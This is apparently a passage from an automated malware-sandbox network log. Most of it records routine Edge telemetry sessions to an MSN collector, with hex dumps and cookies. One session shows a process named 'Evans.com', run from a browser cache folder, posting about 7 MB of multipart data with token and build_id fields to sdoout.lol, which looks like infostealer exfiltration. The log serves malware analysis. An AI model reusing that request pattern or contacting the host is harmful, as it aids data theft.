                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:37 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:37 UTC717OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:38 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:46:38 GMT
                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:38 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                    37192.168.2.55011913.69.239.774436308C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:37 UTC1026OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735634795854&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                                                    Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                    Content-Length: 11073
                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                                    Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                    Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                    Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                                    Cookie: USRLOC=; MUID=05F9EFDB33DC678B1BFFFABD3256667F; _EDGE_S=F=1&SID=1CCB54C755F762B91E6041A1542B63D6; _EDGE_V=1
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:37 UTC11073OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 33 31 54 30 38 3a 34 36 3a 33 35 2e 38 34 39 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 32 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 66 31 35 34 37 65 32 30 2d 63 38 36 36 2d 34 37 34 32 2d 61 62 34 62 2d 61 33 30 38 30 30 34 61 61 37 39 33 22 2c 22 65 70 6f 63 68 22 3a 22 32 38 34 33 39 34 33 34 38 34 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65
                                                                                                                                                                                                                                                                                                                                    Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-31T08:46:35.849Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":2,"installId":"f1547e20-c866-4742-ab4b-a308004aa793","epoch":"2843943484"},"app":{"locale
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:47:04 UTC891INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                    P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                                                    Set-Cookie: MC1=GUID=993651709acf4c58afeff18b32920502&HASH=9936&LV=202412&V=4&LU=1735634824259; Domain=.microsoft.com; Expires=Wed, 31 Dec 2025 08:47:04 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                                    Set-Cookie: MS0=b9788460182f4c8c8651449e7b087fed; Domain=.microsoft.com; Expires=Tue, 31 Dec 2024 09:17:04 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                                    time-delta-millis: 28405
                                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                                    Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:47:04 GMT
                                                                                                                                                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                    38192.168.2.55011813.69.239.774436308C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:37 UTC1025OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735634795885&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                                                    Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                    Content-Length: 4839
                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                                    Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                    Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                    Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                                    Cookie: USRLOC=; MUID=05F9EFDB33DC678B1BFFFABD3256667F; _EDGE_S=F=1&SID=1CCB54C755F762B91E6041A1542B63D6; _EDGE_V=1
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:37 UTC4839OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 33 31 54 30 38 3a 34 36 3a 33 35 2e 38 36 39 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 33 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 66 31 35 34 37 65 32 30 2d 63 38 36 36 2d 34 37 34 32 2d 61 62 34 62 2d 61 33 30 38 30 30 34 61 61 37 39 33 22 2c 22 65 70 6f 63 68 22 3a 22 32 38 34 33 39 34 33 34 38 34 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65
                                                                                                                                                                                                                                                                                                                                    Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-31T08:46:35.869Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":3,"installId":"f1547e20-c866-4742-ab4b-a308004aa793","epoch":"2843943484"},"app":{"locale
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:37 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                    P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                                                    Set-Cookie: MC1=GUID=b42dd2bcfe854315b7e3eeba7b3de737&HASH=b42d&LV=202412&V=4&LU=1735634797250; Domain=.microsoft.com; Expires=Wed, 31 Dec 2025 08:46:37 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                                    Set-Cookie: MS0=c797c7b269ba4af09846a96c46e2cdbe; Domain=.microsoft.com; Expires=Tue, 31 Dec 2024 09:16:37 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                                    time-delta-millis: 1365
                                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                                    Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:46:37 GMT
                                                                                                                                                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                    39192.168.2.55012113.69.239.774436308C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:37 UTC1033OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735634796554&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                                                    Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                    Content-Length: 5418
                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                                    Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                    Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                    Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                                    Cookie: USRLOC=; MUID=05F9EFDB33DC678B1BFFFABD3256667F; _EDGE_S=F=1&SID=1CCB54C755F762B91E6041A1542B63D6; _EDGE_V=1; msnup=
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:37 UTC5418OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 33 31 54 30 38 3a 34 36 3a 33 36 2e 35 35 32 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 34 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 66 31 35 34 37 65 32 30 2d 63 38 36 36 2d 34 37 34 32 2d 61 62 34 62 2d 61 33 30 38 30 30 34 61 61 37 39 33 22 2c 22 65 70 6f 63 68 22 3a 22 32 38 34 33 39 34 33 34 38 34 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65
                                                                                                                                                                                                                                                                                                                                    Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-31T08:46:36.552Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":4,"installId":"f1547e20-c866-4742-ab4b-a308004aa793","epoch":"2843943484"},"app":{"locale
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:38 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                    P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                                                    Set-Cookie: MC1=GUID=8decb4408bdd4c63bf5a91dbe0b21e01&HASH=8dec&LV=202412&V=4&LU=1735634797858; Domain=.microsoft.com; Expires=Wed, 31 Dec 2025 08:46:37 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                                    Set-Cookie: MS0=8e69a94fc9e947828780b1509f6d8d3c; Domain=.microsoft.com; Expires=Tue, 31 Dec 2024 09:16:37 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                                    time-delta-millis: 1304
                                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                                    Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:46:37 GMT
                                                                                                                                                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                    40192.168.2.55012213.69.239.774436308C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:38 UTC1033OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735634796856&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                                                    Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                    Content-Length: 9879
                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                                    Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                    Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                    Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                                    Cookie: USRLOC=; MUID=05F9EFDB33DC678B1BFFFABD3256667F; _EDGE_S=F=1&SID=1CCB54C755F762B91E6041A1542B63D6; _EDGE_V=1; msnup=
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:38 UTC9879OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 43 6f 6e 74 65 6e 74 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 33 31 54 30 38 3a 34 36 3a 33 36 2e 38 35 35 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 35 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 66 31 35 34 37 65 32 30 2d 63 38 36 36 2d 34 37 34 32 2d 61 62 34 62 2d 61 33 30 38 30 30 34 61 61 37 39 33 22 2c 22 65 70 6f 63 68 22 3a 22 32 38 34 33 39 34 33 34 38 34 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63
                                                                                                                                                                                                                                                                                                                                    Data Ascii: {"name":"MS.News.Web.ContentView","time":"2024-12-31T08:46:36.855Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":5,"installId":"f1547e20-c866-4742-ab4b-a308004aa793","epoch":"2843943484"},"app":{"loc
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:38 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                    P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                                                    Set-Cookie: MC1=GUID=3a60150935514ab18f276201ea7b60d3&HASH=3a60&LV=202412&V=4&LU=1735634798260; Domain=.microsoft.com; Expires=Wed, 31 Dec 2025 08:46:38 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                                    Set-Cookie: MS0=d870a80754844e9ea2602662a0667886; Domain=.microsoft.com; Expires=Tue, 31 Dec 2024 09:16:38 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                                    time-delta-millis: 1404
                                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                                    Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:46:37 GMT
                                                                                                                                                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                    41192.168.2.550123116.203.14.44432656C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com
                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:39 UTC279OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----wt26phd26pz5f3ekf3eu
                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                                                                    Host: sdoout.lol
                                                                                                                                                                                                                                                                                                                                    Content-Length: 6990993
                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:39 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 77 74 32 36 70 68 64 32 36 70 7a 35 66 33 65 6b 66 33 65 75 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 64 31 30 33 30 31 34 64 65 62 36 33 33 32 35 65 30 32 34 31 31 61 33 62 65 35 62 35 30 33 33 0d 0a 2d 2d 2d 2d 2d 2d 77 74 32 36 70 68 64 32 36 70 7a 35 66 33 65 6b 66 33 65 75 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 65 66 32 35 61 63 33 65 32 66 62 34 33 66 34 65 33 37 36 30 37 65 36 63 39 62 63 65 39 36 62 0d 0a 2d 2d 2d 2d 2d 2d 77 74 32 36 70 68 64 32 36 70 7a 35 66 33 65 6b 66 33 65 75 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                                                    Data Ascii: ------wt26phd26pz5f3ekf3euContent-Disposition: form-data; name="token"8d103014deb63325e02411a3be5b5033------wt26phd26pz5f3ekf3euContent-Disposition: form-data; name="build_id"8ef25ac3e2fb43f4e37607e6c9bce96b------wt26phd26pz5f3ekf3euCont
